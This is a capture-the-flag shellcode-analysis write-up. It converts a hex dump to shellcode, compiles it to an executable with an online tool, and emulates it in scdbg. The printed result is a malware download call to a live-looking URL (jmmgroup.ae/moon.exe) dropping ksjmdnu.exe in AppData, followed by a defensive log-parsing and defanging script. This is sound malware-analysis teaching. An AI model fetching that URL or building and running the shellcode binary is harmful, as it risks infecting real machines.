Tags: shellcode analysis
We wget the given hexadecimal file and beautify it (essentially adding \x):
```py
shellcode = ""
newShellcode = ""
# Read the raw hex dump (two hex digits per byte)
with open("extracted.hex", "r") as f:
    shellcode = f.read()
i = 0
while i < len(shellcode):
    # Prefix each pair of hex digits with \x
    newShellcode += '\\x'
    newShellcode += shellcode[i]
    try:
        newShellcode += shellcode[i+1]
    except IndexError:
        # Unpaired trailing character (e.g. the final newline): drop it
        newShellcode = newShellcode[:newShellcode.rfind('\\x')]
        newShellcode += '\n'
    i += 2
with open("shellcode.txt", "w") as f:
    f.write(newShellcode)
```
With that beautified code, we need to compile it into a binary with the [SandSprite website](http://sandsprite.com/sc2exe/shellcode_2_exe.php) (make sure "bytes sc" is selected below).
Then we need to download [scDBG](http://sandsprite.com/CodeStuff/scdbg.zip) and we can start searching for the flag.
```bash
scdbg.exe -f <file> /findsc
```
In the load function we can see:
```text
URLDownloadToFileA(http://jmmgroup.ae/moon.exe, C:\Users\Max\AppData\Roaming\ksjmdnu.exe)
```
--> flag{ksjmdnu.exe}
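
The same triage step can be scripted. The following is an added example, not part of the original write-up: it pulls the download URL and the dropped file name out of an emulator log that contains a `URLDownloadToFileA(url, path)` line in the form shown above. The function names and the sample log lines other than the `URLDownloadToFileA` one are assumptions made for illustration.

```python
import ntpath
import re
from urllib.parse import urlsplit

# Matches the call as printed in the write-up: URLDownloadToFileA(<url>, <path>).
# The destination is matched greedily up to the last ')' on the line so that
# Windows paths containing parentheses are kept whole.
CALL_RE = re.compile(
    r"URLDownloadToFile[AW]\(\s*(?P<url>[^,\s]+)\s*,\s*(?P<dest>.*\S)\s*\)"
)

def extract_downloads(log_text):
    """Return one dict per URLDownloadToFile call found in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        url, dest = m.group("url"), m.group("dest")
        findings.append({
            "url": url,
            "host": urlsplit(url).hostname,
            "dest_path": dest,
            # ntpath parses Windows paths correctly on any OS
            "dest_name": ntpath.basename(dest),
        })
    return findings

def defang(url):
    """Make a URL non-clickable before it goes into a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

# Sample log: the URLDownloadToFileA line is taken from the write-up;
# the other two lines are constructed for this example.
SAMPLE_LOG = r"""
LoadLibraryA(urlmon)
URLDownloadToFileA(http://jmmgroup.ae/moon.exe, C:\Users\Max\AppData\Roaming\ksjmdnu.exe)
WinExec(C:\Users\Max\AppData\Roaming\ksjmdnu.exe)
"""

if __name__ == "__main__":
    for hit in extract_downloads(SAMPLE_LOG):
        print(defang(hit["url"]), "->", hit["dest_path"])
        print("flag{%s}" % hit["dest_name"])
```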